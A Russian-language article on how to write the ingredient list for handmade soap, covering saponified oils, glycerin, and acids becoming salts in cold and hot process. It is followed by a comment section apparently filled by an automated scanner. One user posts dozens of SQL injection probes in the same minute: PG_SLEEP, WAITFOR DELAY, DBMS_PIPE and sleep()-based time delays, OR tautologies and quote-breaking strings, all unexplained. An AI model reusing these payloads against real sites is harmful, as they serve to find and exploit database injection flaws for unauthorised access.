Многие мыловары делают мыло не только для себя и близких, но и на продажу. При этом, конечно, для него, как и для любого продукта нужно написать состав. Ничего сложного в этом нет, но есть некоторые нюансы, на которые необходимо обратить внимание.
В состав готового мыла с нуля обязательно входят три компонента:
· соли жирных кислот масел (натриевые или калиевые)
· глицерин
· жидкость
Без них никак! Соли жирных кислот и глицерин можно заменить одной фразой - омыленные масла. А в качестве жидкости могут выступать вода, сок, отвары и прочие жидкости, в которых разводилась щелочь.
В случае дополнительно вводимых ингредиентов нужно понимать, что если среда была щелочная, то этот компонент скорее всего прореагирует с щелочью с образованием новых веществ, если только он не устойчив к щелочи (условия при холодном способе). А если ингредиент вводился тогда, когда вся щелочь уже вступила в реакцию, то он останется в неизменном виде (возможно только при горячем способе приготовления мыла).
При приготовлении мыла холодным способом, независимо от того, на какой стадии вводились в мыльную массу масла, все они записываются как соли жирных кислот масел (и перечисляются все масла в рецепте). Масла в чистом виде могут быть записаны в состав, только если мыло готовилось горячим способом и масло вводилось после реакции омыления, то есть в самом конце приготовления мыла перед выкладыванием в форму.
Довольно часто в рецепт мыла вводятся кислоты. И тут тоже нужно аккуратно подумать, как их записать в состав. При холодном способе, как и при горячем, в случае введения в рецепт до реакции омыления, все кислоты вступают в реакцию с щелочью с образованием солей. Например, лимонная кислота станет солью лимонной кислоты, или другое ее название - цитрат.
Вводимая в рецепт кислота | Продукт реакции с щелочью |
Лимонная | Цитрат |
Молочная | Лактат |
Стеариновая | Стеарат |
Янтарная | Сукцинат |
Аминоуксусная (глицин) | глицинат |
В случае введения кислот при горячем способе после реакции омыления, эти кислоты вносятся в состав именно как кислоты, поскольку в реакцию с щелочью не вступают.
Любые другие вводимые добавки лучше указывать в том виде, в котором они вводились (глина, деготь, коконы шелкопряда, порошок, пюре, пудра чего угодно и так далее).
Также для полноты информации о мыле, было бы хорошо указывать процент пережира и вводимых лечебных добавок (кислоты или их соли, деготь, активированный уголь и прочее). Ведь активная добавка может быть одна, а основной рецепт мыла разный. Конечно, далеко не все потребители разбираются в характеристиках мыла, но мыловарное ремесло бурно развивается, и пора уже вводить систему описания характеристик мыла. Чтобы любой человек, взявший в руки кусочек мыла с этикеткой мог без посторонней помощи сориентироваться о его основных свойствах. Но если не хочется указывать проценты, то обязательно нужно написать для какого типа кожи предназначено это мыло, а для какого его использовать нельзя. Иначе может быть подорвано доверие к мыловару и его продукту!
Автор - Бережная Анастасия
-
qpafhouk 22 ноября 2021 в 20:39555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'
-
qpafhouk 22 ноября 2021 в 20:39555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
-
qpafhouk 22 ноября 2021 в 20:39xSzOa7Yy')) OR 691=(SELECT 691 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:39FVeuENNb') OR 318=(SELECT 318 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:39oSla7rM1' OR 987=(SELECT 987 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:39-1)) OR 173=(SELECT 173 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:39-5) OR 737=(SELECT 737 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:39-5 OR 873=(SELECT 873 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:397fhCPMV1'; waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 20:391 waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 20:39-1); waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 20:39-1; waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 20:39(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
-
qpafhouk 22 ноября 2021 в 20:390"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
-
qpafhouk 22 ноября 2021 в 20:390'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
-
qpafhouk 22 ноября 2021 в 20:39if(now()=sysdate(),sleep(12),0)
-
qpafhouk 22 ноября 2021 в 20:39119'
-
qpafhouk 22 ноября 2021 в 20:39-1" OR 2+383-383-1=0+0+0+1 --
-
qpafhouk 22 ноября 2021 в 20:39-1' OR 2+342-342-1=0+0+0+1 or '9qah5xhG'='
-
qpafhouk 22 ноября 2021 в 20:39-1' OR 2+541-541-1=0+0+0+1 --
-
qpafhouk 22 ноября 2021 в 20:39-1 OR 2+156-156-1=0+0+0+1
-
qpafhouk 22 ноября 2021 в 20:39-1 OR 2+746-746-1=0+0+0+1 --
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39555
-
qpafhouk 22 ноября 2021 в 20:39JyI=
-
qpafhouk 22 ноября 2021 в 20:39@@tCV1D
-
qpafhouk 22 ноября 2021 в 20:39\
-
qpafhouk 22 ноября 2021 в 20:391'"
-
qpafhouk 22 ноября 2021 в 20:39555